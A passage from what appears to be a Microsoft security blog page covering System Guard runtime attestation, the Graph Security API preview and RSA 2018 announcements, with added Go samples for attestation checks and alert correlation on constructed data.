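}

// BootPolicyStable: properties the secure policy fixed at boot must read the same at runtime.
type BootPolicyStable struct{}

func (BootPolicyStable) Name() string { return "boot-policy-stable" }

func (BootPolicyStable) Check(baseline, current Snapshot) (bool, string) {
	switch {
	case baseline.HVCIEnabled && !current.HVCIEnabled:
		return false, "HVCI reported disabled after boot"
	case !baseline.TestSigning && current.TestSigning:
		return false, "test-signing reported enabled after boot"
	case !baseline.KernelDebugger && current.KernelDebugger:
		return false, "kernel debugger reported enabled after boot"
	}
	return true, ""
}

func DefaultAssertions() []Assertion { return []Assertion{ProtectionIntact{}, BootPolicyStable{}} }

// Report is the engine's output; Advisory marks the lowest level, where results are only a signal.
type Report struct {
	SecurityLevel int
	Advisory      bool
	Checked       int
	Failed        map[string]string // assertion name -> detail, for assertions that did not hold
}

// Evaluate runs every assertion. Level 1 is the lowest on this placeholder scale.
func Evaluate(level int, assertions []Assertion, baseline, current Snapshot) Report {
	rep := Report{SecurityLevel: level, Advisory: level <= 1, Failed: map[string]string{}}
	for _, a := range assertions {
		rep.Checked++
		if ok, detail := a.Check(baseline, current); !ok {
			rep.Failed[a.Name()] = detail
		}
	}
	return rep
}

func main() {
	// Constructed sample: the protected process has had its protection flag cleared at runtime.
	baseline := Snapshot{HVCIEnabled: true, Processes: []ProcessState{
		{PID: 812, Image: "svc.exe", Protected: true, Signer: "WinTcb"}}}
	current := Snapshot{HVCIEnabled: true, Processes: []ProcessState{
		{PID: 812, Image: "svc.exe", Protected: false, Signer: "WinTcb"}}}
	rep := Evaluate(3, DefaultAssertions(), baseline, current)
	fmt.Printf("level %d advisory=%v checked=%d\n", rep.SecurityLevel, rep.Advisory, rep.Checked)
	for name, detail := range rep.Failed {
		fmt.Printf("FAIL %s: %s\n", name, detail)
	}
}
```

The skip of exited or reused PIDs reflects the post's caveat that the assertions assume non-racing conditions; a process that disappears between measurements is a lifetime event for the kernel agent, not evidence of tampering, and a stricter engine would correlate it with process-exit notifications before concluding anything.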

We believe that we can significantly raise the bar for security on locked-down platforms with modern hardware and appropriate security policies. In a world where direct privileged code-execution is difficult, we think that attacks will increasingly leverage data corruption. Transient changes are also a challenge in the current model. However, future innovations will make achieving persistence harder, making transient malicious changes more difficult. The idea is to continually elevate defense across the entire Windows 10 security stack, thereby pushing attackers into a corner where system changes affecting security posture are detectable. One can think of runtime attestation as being more about detecting minute symptoms that can indicate an attack rather than looking for flashing signals.

We are very excited about this technology because of its potential for making significant leaps in platform security. There's a lot more about Windows Defender System Guard runtime attestation that we did not cover in this blog, for example, the detailed design itself and where we see this technology going. Stay tuned.



David Kaplan (@depletionmode), Windows Defender ATP Research Team
Adam Zabrocki (@Adam_pi3), Windows Offensive Security Research Team
Rafael Goncalves, Enterprise & Security




Connect to the Intelligent Security Graph using a new API

Most organizations deal with high volumes of security data and have dozens of security solutions in their enterprise, making the task of integrating various products and services daunting and complex. The cost, time, and resources necessary to connect systems, enable correlation of alerts, and provide access to contextual data is extremely high. These challenges hinder the ability for organizations to move quickly when detecting and remediating threats in a world of fast-moving, disruptive attacks.

By connecting security data and systems, we can gain an advantage over today's adversaries. At Microsoft, our security products are powered by the Intelligent Security Graph, which synthesizes massive amounts of threat intelligence and security signals from across Microsoft products, services, and partners using advanced analytics to identify and mitigate cyberthreats. This week at the RSA conference, we announced the public preview of a Security API that empowers customers and partners to build on the Intelligent Security Graph. By connecting security solutions and integrating with existing workflows, alerts and contextual information from multiple solutions can be easily consolidated and correlated to inform threat detection, and actions can be taken to streamline incident response. The unified API will make these connections easier by providing a standard interface and uniform schema to integrate and correlate security alerts from multiple sources, enrich investigations with contextual data, and automate security operations for greater efficiency.

The Security API is part of the Microsoft Graph, which is a unified REST API for integrating data and intelligence from Microsoft products and services. Using Microsoft Graph, developers can rapidly build solutions that authenticate once and use a single API call to access or act on security insights from multiple security solutions. Additional value is uncovered when you explore the other Microsoft Graph entities (Office 365, Azure Active Directory, Intune, and more) to tie business context to your security insights.

This public preview supports API access to alerts from Azure Security Center and Azure Active Directory Identity Protection, with Intune and Azure Information Protection coming soon. We are also announcing support for high-volume streaming of alerts to a SIEM through Security API integration with Azure Monitor. This will enable seamless ingestion of alerts from multiple sources directly into a SIEM. Over the coming months, we'll add many more Microsoft and partner security solution integrations as data providers. We will also add new capabilities that unlock new security context through Security Inventory and take actions to automate security operations through the same Security API.

Enabling ecosystem partners

The Security API opens up new possibilities for integration partners to build with the Intelligent Security Graph. Partners can not only consume security insights from the Graph but they can allow their alerts, context, and automation to be enabled in the Graph at peer level with integrated Microsoft products. By forming a connected, extended ecosystem of security technologies, Microsoft and partners can deliver better protections for our customers. Some partners have already onboarded to the Security APIs and many other integrations are in progress:


Anomali integrates with the Security API to correlate alerts from Microsoft Graph with threat intelligence, providing earlier detection and response to cyber threats.

"The Security Graph API allows us to receive not only actionable alert information but also allows security analysts to pivot and enrich alerts with asset and user information." - Colby DeRodeff, Co-founder and Chief Strategy Officer of Anomali


Palo Alto Networks can enrich alerts from Microsoft Graph Security with threat intelligence speeding up detection and prevention of cyberattacks for our shared customers.

"The adoption of public clouds is accelerating, but so is the threat level to the applications and data inside organizations. Today's announcement of the Microsoft Graph Security API sets the stage for expanding the built-in security features we can offer our joint customers and to help organizations safely embrace the cloud." - Andy Horwitz, Vice President, Business and Corporate Development, Palo Alto Networks


PwC uses alerts and context from Microsoft Graph in its Secure Terrain solution to deliver improved visibility and protection.

"The integration with Secure Terrain offers users a streamlined way to investigate Microsoft Graph alerts in the context of the broader enterprise and perform threat hunting investigations." - Christopher Morris, Principal at PricewaterhouseCoopers

Building intelligent security applications

Customers, managed service providers, and technology partners, can leverage the Security APIs to build and integrate a variety of applications. Some examples include:

  • Custom security dashboards. Surface rich alerts in your custom Security Operations Center dashboards: streamline alerts and add contextual information about related entities.
  • Security operations tools. Manage alerts in your ticketing, security, or IT management system: keep alert status and assignments in sync and automate common tasks.
  • Threat protection solutions. Correlate alerts and contextual information for improved detections, and take action on threats: block an IP on a firewall or run an AV scan.
  • Other applications. Add security functionality to non-security applications such as HR, financial, and healthcare apps.
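
Two of the integrations listed above (correlating alerts from several providers about one asset, and keeping alert status and assignment in sync from a ticketing system) as an added example in Go. It is not Microsoft's sample code. It works on the response body you would receive from the alerts collection under /security/alerts of the Microsoft Graph with a bearer token, so the HTTP call itself is left out; the field names (id, title, severity, status, createdDateTime, vendorInformation, hostStates, userStates), the status values, the provider strings ASC and IPC, and the assumption that an update must echo vendorInformation are recalled from the Graph alert resource and should be checked against the current reference. The sample response, its hosts and users are constructed.

```go
package main

import (
	"encoding/json"
	"fmt"
	"sort"
	"time"
)

// VendorInformation identifies which product raised the alert.
type VendorInformation struct {
	Provider string `json:"provider"`
	Vendor   string `json:"vendor"`
}

type HostState struct{ FQDN string `json:"fqdn"` }
type UserState struct{ UPN string `json:"userPrincipalName"` }

// Alert is the subset of the Graph alert resource used here (field names assumed, see lead-in).
type Alert struct {
	ID                string            `json:"id"`
	Title             string            `json:"title"`
	Severity          string            `json:"severity"`
	Status            string            `json:"status"`
	CreatedDateTime   time.Time         `json:"createdDateTime"`
	VendorInformation VendorInformation `json:"vendorInformation"`
	HostStates        []HostState       `json:"hostStates"`
	UserStates        []UserState       `json:"userStates"`
}

// ParseAlerts decodes the OData collection wrapper returned by the alerts endpoint.
func ParseAlerts(body []byte) ([]Alert, error) {
	var page struct {
		Value    []Alert `json:"value"`
		NextLink string  `json:"@odata.nextLink"` // follow when present to page through results
	}
	if err := json.Unmarshal(body, &page); err != nil {
		return nil, err
	}
	return page.Value, nil
}

// CorrelateByEntity groups alerts by the host or user they reference, so alerts
// raised by different providers about the same asset land together.
func CorrelateByEntity(alerts []Alert) map[string][]Alert {
	groups := map[string][]Alert{}
	for _, a := range alerts {
		for _, h := range a.HostStates {
			groups["host:"+h.FQDN] = append(groups["host:"+h.FQDN], a)
		}
		for _, u := range a.UserStates {
			groups["user:"+u.UPN] = append(groups["user:"+u.UPN], a)
		}
	}
	return groups
}

// MultiProviderEntities returns, sorted, the entities that more than one provider has alerted on.
func MultiProviderEntities(groups map[string][]Alert) []string {
	var out []string
	for entity, as := range groups {
		providers := map[string]bool{}
		for _, a := range as {
			providers[a.VendorInformation.Provider] = true
		}
		if len(providers) > 1 {
			out = append(out, entity)
		}
	}
	sort.Strings(out)
	return out
}

// StatusPatch builds the JSON body for updating one alert's status and assignee
// from a ticketing system; echoing vendorInformation is an assumed requirement.
func StatusPatch(a Alert, status, assignedTo string) ([]byte, error) {
	return json.Marshal(map[string]interface{}{
		"status":            status,
		"assignedTo":        assignedTo,
		"vendorInformation": a.VendorInformation,
	})
}

// Constructed sample response; ids, hosts and users are made up.
const sampleResponse = `{"value":[
 {"id":"a1","title":"Suspicious process on host","severity":"high","status":"newAlert",
  "createdDateTime":"2018-04-16T10:00:00Z","vendorInformation":{"provider":"ASC","vendor":"Microsoft"},
  "hostStates":[{"fqdn":"ws01.constructed.example"}],"userStates":[{"userPrincipalName":"alice@constructed.example"}]},
 {"id":"a2","title":"Sign-in from anonymous IP","severity":"medium","status":"newAlert",
  "createdDateTime":"2018-04-16T10:05:00Z","vendorInformation":{"provider":"IPC","vendor":"Microsoft"},
  "hostStates":[],"userStates":[{"userPrincipalName":"alice@constructed.example"}]},
 {"id":"a3","title":"Outdated agent","severity":"low","status":"newAlert",
  "createdDateTime":"2018-04-16T09:00:00Z","vendorInformation":{"provider":"ASC","vendor":"Microsoft"},
  "hostStates":[{"fqdn":"ws02.constructed.example"}],"userStates":[]}
]}`

func main() {
	alerts, err := ParseAlerts([]byte(sampleResponse))
	if err != nil {
		panic(err)
	}
	for _, e := range MultiProviderEntities(CorrelateByEntity(alerts)) {
		fmt.Println("multiple providers alerted on", e)
	}
	body, _ := StatusPatch(alerts[0], "inProgress", "soc@constructed.example")
	fmt.Println(string(body))
}
```

The value of the uniform schema shows in CorrelateByEntity: the Azure Security Center host alert and the Identity Protection sign-in alert share a user entity, so a dashboard can surface them as one incident without provider-specific parsing.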

Get started today:

Join us at the Microsoft booth, N3501 in the north expo hall, at RSA Conference 2018 in San Francisco. You'll get the chance to speak to experts and see how our partners are using the API.

To learn more and get started today with using the Microsoft Graph Security API, check out the following resources:


Tapping the intelligent cloud to make security better and easier

April 16th, 2018

There has been a distinct shift in my conversations with customers over the last year. Most have gone from asking, "Can we still keep our assets secure as we adopt cloud services?" to declaring, "We are adopting cloud services in order to improve our security posture." The driving factor is generally a realization that a cloud services provider can invest more in security, do the job better, and just make life simpler for overburdened enterprise IT and SecOps teams. This idea of making sound security practices easier to implement is a big part of our strategy. Today we're announcing several new technologies and programs that build on our unique cloud and intelligence capabilities to make it easier for enterprises to secure their assets from the cloud to the edge.

The first step in protecting people and data from today's dynamic threat landscape is accepting reality. It's time for us as an industry to recognize that the cloud holds so much promise for helping us solve security problems that we should consider the use of cloud-based intelligence a security imperative, not just for workloads deployed in the cloud, but also for improving the security of endpoints.

We recently released the 23rd edition of our Security Intelligence Report. The trends it uncovers help us see why the cloud is becoming a security imperative. Threats are increasingly automated and destructive. No one organization can amass the resources and intelligence to defend against these fast-moving threats. We have to tap into the power of the cloud, and of artificial intelligence, in order to muster the defenses required.

One of the most powerful examples of cloud-based artificial intelligence accelerating Microsoft's own security innovation is the Microsoft Intelligent Security Graph. Our Intelligent Security Graph uses advanced analytics to link threat intelligence and security signals from Microsoft and partners and continues to increase in variety and volume of signal. For example, we see the threat landscape through the lens of the 18 billion web pages that Bing scans, the 400 billion emails that are analyzed for spam and malware, and the 5 billion distinct malicious threats that Windows Defender ATP protects our customers against each month.

Artificial intelligence gets better as it is trained with more signal from more diverse sources. Today, we are announcing the preview of a new unified security API in the Microsoft Graph, which allows our technology partners to easily integrate with Microsoft solutions and tap into the power of the Intelligent Security Graph.

The Intelligent Security Graph comes to life through our platform investments, where it connects our security solutions to improve protection, detection, and response. Microsoft invests more than $1 billion in cybersecurity R&D annually, to build new security innovations into Windows, Azure, and Microsoft 365. Today we are announcing new capabilities to help our customers improve their protection against threats and, when attacked, detect and respond more quickly. We are working with partners across the industry to better integrate solutions for our customers.

Improving protection

A fundamental concern for many IT teams is the struggle to know the true security posture of the organization: are all the necessary controls in place? Have all updates been applied? Is everything configured correctly? More importantly, it's hard to know what the next steps should be to improve security. Today we are announcing the availability of Microsoft Secure Score, which gives the IT administrator a combined view of security readiness across a broad swath of the digital estate, from Office 365 services to endpoint devices.

To get around properly configured protection, attackers often focus on deceiving end users with phishing and social engineering techniques. We have made a number of advances in our Office 365 ATP anti-phishing protection recently, and now we are adding Attack Simulator for Office 365 Threat Intelligence in Microsoft 365, so IT teams can train users to guard against phishing.

Information is the beating heart of any company, and the target of most attacks. It’s also a regulatory focus, especially with the new EU GDPR enforcement date rapidly approaching. In February, we announced a set of Microsoft 365 updates to help our customers manage compliance and protect information. As we near the GDPR enforcement date, today we are announcing several new tools and capabilities that help you respond to GDPR obligations with the Microsoft Cloud. Read more about them later today on the Office 365 blog.

Speeding up detection and response

Of course, no protection strategy can be 100% effective. Savvy customers are improving their detection and response capabilities to prepare for the inevitable breach. The Conditional Access capability built into Microsoft 365 has helped many of our customers dramatically improve their protection for tens of millions of employees, by assessing the risk of each request for access to a system, an application, or data, in real time. That risk level informs how much access is granted, according to policy set by IT.

We are extending Conditional Access to factor in post-breach response. New conditions based on continual assessment of endpoint health, not just a one-time check of configuration, enable our customers to restrict or deny access to resources if the device from which the request originates has been compromised by an attack. This new capability is in preview and will be generally available in the next Windows 10 update. Rapid detection and recovery remain out of reach for many of our customers because the specialized skills required to hunt down and eliminate adversaries are in high demand but short supply. To help IT focus its strained resources on the most important issues, we are announcing the general availability of automated remediation as part of Windows Defender ATP in the next Windows 10 update. With this new capability, Windows Defender ATP can automatically apply common remediations, freeing up the experts to work on more difficult recovery tasks.

Our work on detection and response extends to Microsoft Azure as well. As our customers embrace the cloud, Azure Security Center is a key tool that helps them simplify hybrid cloud security and keep pace with ever-evolving threats. Several new capabilities will be available with Security Center this week that help to identify and mitigate vulnerabilities proactively and detect new threats quickly. With the integration of Windows Defender ATP in preview, customers can get all the benefits of advanced threat protection for Windows servers in Azure Security Center.

Working across the industry

Customers who use Microsoft 365 have been taking advantage of increasingly robust tools to protect Office documents and e-mails wherever they go inside and outside the organization. Today we are extending these capabilities to our technology partners with the release of the Azure Information Protection SDK.

The benefits we can all gain from applying cloud intelligence to security problems are tremendous, but can only be fully realized if we work together across the industry. Nearly every customer I speak to has a dozen or more different security solutions in place. Each of those solutions plays a critical role in protecting the organization, and each has valuable contextual information that would help make the others more effective at protecting customers. Today we are announcing the Microsoft Intelligent Security Association, a group of technology providers who have integrated their solutions with Microsoft products to provide customers better protection, detection, and response. Anomali, Check Point, Forcepoint, Palo Alto Networks, and Ziften are among the solution providers working with us. Together, we can bring more signals from more sources to bear, which helps our customers detect and respond to threats faster.

We also continue to work with a broad coalition of technology partners in the FIDO Alliance to address one of the most fundamental issues in security today: identity and access management. Our analysis indicates that cloud-based user account attacks are up more than 300% over the past year. Passwords are the weakest link, and they are a source of frustration for users. Today we are announcing an important step in our work to lead the industry toward a future without passwords: support for the FIDO 2.0 standard in the next Windows 10 update. Millions of Windows 10 users already have the ability to sign in to Windows without a password using Windows Hello, making authentication stronger and easier. With FIDO 2.0 support, users can take that same password-free authentication experience to any Windows 10 device managed by their organization.

The evolution of the intelligent edge

At Microsoft, we believe the intelligent cloud and intelligent edge will shape the next phase of innovation. The rise of Internet of Things deployments amplifies security challenges, because many devices lack the tools to manage updates or detect and respond to attacks. Building on research done by Microsoft AI and Research, and on decades of Microsoft experience and expertise in silicon, software, and cloud security, today we are announcing the preview of Azure Sphere. Azure Sphere extends our reach to the outer regions of the intelligent edge, enabling us to serve and secure an entirely new category of devices — the billions of MCU powered devices that are built and deployed each year.

It's an exciting time to be working in security. We are joining forces with other security solution providers and using the cloud to our customers' advantage. Together, we can turn the tide against attackers. We are at the RSA Conference this week, and looking forward to discussing these new capabilities with you. Visit to learn where you can find us.

